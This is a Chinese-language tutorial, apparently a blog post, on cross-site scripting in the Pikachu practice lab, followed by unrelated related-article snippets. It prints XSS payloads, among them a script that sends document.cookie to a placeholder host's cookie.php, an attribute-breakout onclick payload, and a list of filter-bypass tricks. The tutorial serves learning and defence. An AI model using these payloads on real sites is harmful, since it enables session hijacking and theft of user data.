【网络安全】-xss跨站脚本攻击-pikachu

news2024/11/13 7:55:18

文章目录

前言  什么是xss跨站脚本攻击?

 1.xss的分类:

     1.1 反射型xss

  1.2 存储型xss

  1.3 Dom型xss:

 2.同源策略:

     2.1同源策略的定义

     2.2同源策略的绕过

  2.3 绕过同源策略的绕过

           


前言  什么是xss跨站脚本攻击?

因为网站程序对用户的输入过滤不足,导致hacker可以在网站上插入恶意脚本代码。

这些脚本代码在输出时会被当成源进行代码解析执行,弹窗显示在页面上,对其他用户造成影响,例如劫持cookie、钓鱼、挂马、盗取用户资料、利用用户身份进行非法活动或者直接上传木马病毒侵害主机。


1.xss的分类:

1.1 反射型xss

传参不被存储在数据库中,服务端只是简单的把反射型XSS用户输入的数据反射给浏览器,是一次性的。

举例:皮卡丘靶场,反射型xss。
输入1,查看回显信息,message=1&sumbmit=提交


 
依次输入2,3查看。
发现回显信息分别是message=2&sumbmit=提交,message=3&sumbmit=提交。

分析:message=我们输入的信息&点击提交的表单。

而本题是xss跨站脚本攻击, 我们输入的信息就是xss脚本代码的插入点,可以在网站上插入恶意脚本代码, 等同于message=恶意脚本代码&点击提交的表单。

我们插入<script>alert('XSS');</script>恶意脚本试试。


 
这说明我们插入恶意脚本已经被执行。

接下来便可以进行xss跨站脚本攻击。
(1)    劫持cookie:
1.    弹出cookie:<script>alert(document.cookie)</script>
 
2. 劫持cookie:
第一步:编写cookie.php脚本
第二步:
<script>document.location='http://主机地址/cookie.php   //cookie地址
?cookie='+document.cookie; </script>      //劫持cookie
第四步:访问document.location='http://主机地址/cookie.php  查看。

(2)    钓鱼钓鱼、挂马、盗取用户资料之类的大差不差,仅仅结合了csrf,深入学习时别忘了《网络安全法》。

1.2 存储型xss

传参被存在数据库里面可以重复使用。


 
输入1,2都没有回显信息,插入<script>alert('XSS');</script>脚本试试。


 
还是弹窗,感觉没什么特别的。
直到我多输了几次,每次进入都是满屏弹窗,一个接一个,有这时间,哪怕知道hacker入侵也只能干等着,想想那种xx的心……

1.3 Dom型xss:

不与后台服务器产生数据交,通过前端的dom节点形成。


 
输入1,回显你看到了什么?
输入2,还是回显你看到了什么?
插入恶意脚本<script>alert('XSS');</script>试试,还是回显你看到了什么?

好像是固定外链,点一下返回报错界面。


 
联想Dom型xss:不与后台服务器产生数据交,通过前端的dom节点形成。
所以你看到了什么?是前端的dom节点,检查页面源代码,


 
 右上角,点击你看到了什么?进行检查,灰色选框自动跳转到代码行,下拉菜单得到源代码。
 
分析:
输入1
源代码<a href="1" _msttexthash="27140139" _msthash="89">你看到了什么?</a>
其中点击1跳转的便是我们的报错界面。

但是插入恶意脚本为什么也是外链?
不该是弹窗吗?

直到我们查看源代码,才发现:我们的恶意脚本<script>alert('XSS');</script>
因闭合方式空缺成了
 
根据提示:


 
构建' οnclick="alert('xss')">,弹出脚本。

2.同源策略:

 为了安全考虑,所有浏览器都约定了同源策略-禁止页面加载或执行与自身来源不同的域中的任何脚本。

2.1同源策略的定义:

在同源策略中,“源”是由三个要素组成的:
1.    协议(Protocol):如http、https。
2.    域名(Domain):如example.com、localhost。
3.    端口(Port):如80(HTTP的默认端口)、443(HTTPS的默认端口)。
只有当两个页面的协议、域名和端口号都相同时,它们才被认为是同源的。

2.2同源策略的绕过:

同源策略虽然安全,但在实际生活中,难免需要跨域访问资源:
1.    CORS(跨源资源共享):服务器设置Access-Control-Allow-Origin等CORS头部,允许来自特定源的请求访问资源。
2.    JSONP:一种非官方的跨域数据交换协议,通过动态插入<script>标签来实现跨域请求,但需要注意的是,JSONP只支持GET请求,并且存在安全风险,因为它无法验证响应内容的来源。
3.    其他iframe、location.hash、window.name、HTML标签也可以用于实现跨域资源访问。

2.3 绕过同源策略的绕过

在绕过同源策略时,又引入了跨站脚本攻击(XSS)等安全风险。

 1. 只是严格过滤了恶意脚本语言的关键字,可以注释,编码,拼凑,大小写混合绕过。
 2. 标签语法蓸换
 3. 特殊符号干扰
 4. 提交方式更改
 5. 结合其他漏洞绕过

结语:xss攻击,同源策略,同源策略的绕过,绕过同源策略的绕过,怎么说呢,好像一场宿命的轮回......

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2125753.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

两个月冲刺软考——重点理解传值方式与传引用方式的区别

1.总线的分类(按功能划分) 数据总线负责传输实际的数据。 地址总线用于指定数据的来源或目的地的内存地址。 控制总线传输控制信号&#xff0c;如读写指令和其他操作指令。 2.传值方式与传引用方式 传值方式&#xff1a;形参取的是实参的值&#xff0c;形参的改变不会导致调…

开源数据集 FreiHAND rgb 三维手势建模 手部关键点 >> DataBall

开源数据集 FreiHAND rgb 三维手势建模 手部关键点 mano hand 混合现实 深度学习 人工智能 FreiHAND是一个用于评估和训练深度神经网络以从单色图像中估计手部姿态和形状的数据集&#xff0c;这是在我们的论文中提出的。其当前版本包含32560个独特的训练样本和3960个独特的评估…

【JavaScript】LeetCode:26-30

文章目录 26 矩阵置零27 螺旋矩阵28 旋转图像29 搜索二维矩阵Ⅱ30 相交链表 26 矩阵置零 2次双重for循环。第1次&#xff1a;将matrix[i][j]为0时的i、j分别存放于数组res_i、res_j&#xff0c;记录有哪些行、列应该置为0。第2次&#xff1a;将记录中的行、列置为0。 /**- par…

揭秘蛇形机器人的主动SLAM算法和障碍物避让策略

更多优质内容&#xff0c;请关注公众号&#xff1a;智驾机器人技术前线 1.论文信息 论文标题&#xff1a;An active SLAM with multi-sensor fusion for snake robots based on deep reinforcement learning 作者&#xff1a;Xin Liu, Shuhuan Wen, Yaohua Hu, Fei Han, Hong…

如何利用免费工具轻松设计出专业Logo?

Logo 作为品牌的象征和视觉核心&#xff0c;承载了品牌的价值和理念。无论是创业公司还是个人品牌&#xff0c;拥有一个独特的 Logo 都显得尤为重要。然而&#xff0c;设计一个专业的 Logo 通常需要高昂的设计费用&#xff0c;许多人因此望而却步。幸运的是&#xff0c;随着互联…

视频合并实用教程分享,教你6个合并视频方法,不可错过!

多个视频怎么合成一个视频&#xff1f;如何把2个视频合成一个&#xff1f;怎么把多个视频合成一个视频&#xff1f;您是否也曾产生过这样的疑问呢&#xff1f;在如今互联网高速发展的时代&#xff0c;各行各业都难免需要涉及到视频制作领域&#xff0c;如果您正在考虑视频如何有…

HarmonyOS开发之模拟器地图点击无效问题

问题描述 当我们模拟器已经运行了&#xff0c;但是需求中需要引用地图&#xff0c;地图的点击事件无效&#xff0c;模拟器地图点击事件以及地拖拖拽无效&#xff0c;这个时候需要配置一下通过 chrome://inspect/#devices 通常用于远程调试移动设备上的 Chrome 浏览器 1、先配…

Cortex-A7:ARM官方推荐的嵌套中断实现机制

0 参考资料 ARM Cortex-A(armV7)编程手册V4.0.pdf ARM体系结构与编程第2版 1 前言 Cortex-M系列内核MCU中断硬件原生支持嵌套中断&#xff0c;开发者不需要为了实现嵌套中断而进行额外的工作。但在Cortex-A7中&#xff0c;硬件原生是不支持嵌套中断的&#xff0c;这从Cortex-A…

Sentinel实时监控不展示问题

问题 官方插件 Endpoint 支持&#xff0c;可以实时统计出SpringBoot的健康状况和请求的调用信息 在使用 Endpoint 特性之前需要在 Maven 中添加 spring-boot-starter-actuator 依赖&#xff0c;并在配置中允许 Endpoints 的访问。 Spring Boot 1.x 中添加配置 management.se…

硬件工程师笔试面试——MOS管

目录 8、MOS管 8.1 基础 MOS管原理图 MOS实物图 8.1.1 概念 8.1.2 特点 8.1.3 类型 7.2 相关问题 7.2.1 MOS管在不同应用中的阈值电压和最大漏极电流通常是多少? 7.2.2 如何根据电路设计选择合适的MOS管类型? 7.2.3 MOS管在高频应用中的优势是什么,它如何影响电路…

数据结构(4)栈和队列

一、栈 栈是一种线性的数据存储结构&#xff0c;由于栈只允许从一端进行数据的插入和删除。因此&#xff0c;栈是先进后出&#xff08;FILO&#xff09;的特性。 系统栈是由系统进行创建和维护的&#xff0c;数据结构中的栈是由自己创建和维护的。 栈的类型有&#xff1a;满增栈…

网络基础入门指南(三)

一、远程管理交换机 1.配置IP地址 远程管理需要通过IP地址访问网络设备交换机的接口&#xff0c;默认无法配置IP地址需要使用虚接口vlan1 2.配置远程登录密码 远程管理需要配置VTY接口VTY是虚拟终端&#xff0c;是一种网络设备远程连接的方式vty 0 4表示可同时打开5个会话 3…

数控纵切自动车床

数控纵切自动车床&#xff0c;作为现代机械加工领域的重要设备&#xff0c;集成了高精度、高效率与自动化等诸多优势。下面&#xff0c;我将从多个方面为您详细介绍这一先进设备。 ‌一、设备概述‌ 数控纵切自动车床&#xff0c;顾名思义&#xff0c;是一种结合了数控技术与纵…

vscode clang-format 格式化

系列文章目录 文章目录 系列文章目录vscode clang-formatOverview1.安装 clang-format2.设置格式化配置文件3.格式化配置文件示例关于作者 vscode clang-format Overview 项目统一格式化clang-formatvscode 1.安装 clang-format 1.vscode中&#xff0c;进行以下操作&#…

C++(二)----类和对象

一、前言 众所周知&#xff0c;C与C语言不同的地方就是&#xff0c;C引入了类和对象&#xff0c;可以在兼容C语言的同时面向对象编程&#xff0c;同时具备了封装、继承、多态三种特点&#xff08;划重点&#xff09;。面向对象可以说是C最重要的部分了&#xff0c;而类和对象就…

AnyChart 数据可视化框架

AnyChart 数据可视化框架 AnyChart 是一个灵活的 JavaScript&#xff08;HTML5、SVG、VML&#xff09;图表框架&#xff0c;适合任何需要数据可视化的解决方案。 目录 下载并安装开始插件将 AnyChart 与 TypeScript 结合使用将 AnyChart 与 ECMAScript 6 结合使用技术集成贡献…

区块链学习笔记1--比特币

区块链是分布式数据存储、点对点传输、共识机制、加密算法等计算机技术的新型应用模式。 从狭义上来说&#xff1a;区块链是一种按照时间顺序将数据区块以顺序相连的方式组合成的一种链式数据结构&#xff0c;并以密码学的方式保证的不可篡改和不可伪造的分布式账本。 意思就是…

Zabbix自定义监控项与触发器

当我们需要获取某台主机上的数据时&#xff0c;直接利用 zabbix 提供的模板可以很方便的获得需要的数据,但是有些特别的数据&#xff0c;利用这些现有的模板或监控项是无法实现的&#xff0c;例如网站状态信息的监控、mysql数据库主从状态等信息。这是就需要自己定义键值和监控…

上门家政做饭系统小程序开发概览

上门做饭系统是一种融合了现代科技手段的创新餐饮服务模式&#xff0c;旨在为用户提供便捷且个性化的上门烹饪体验。通过互联网技术&#xff0c;这一系统连接了专业的私人厨师与有需求的家庭或个人&#xff0c;让高品质的餐饮服务更加触手可及。编辑&#xff1a;qawsed2466 核心…

【C++】优先级队列反向迭代器的实现

一、优先级队列&#xff1a; 优先级队列&#xff08;priority queue&#xff09;是一种容器适配器&#xff0c; 它默认使用vector作为其底层存储数据的容器&#xff0c;在vector上又使用了堆算法将vector中元素构造成堆的结构&#xff0c;因此priority_queue就是堆&#xff0c;…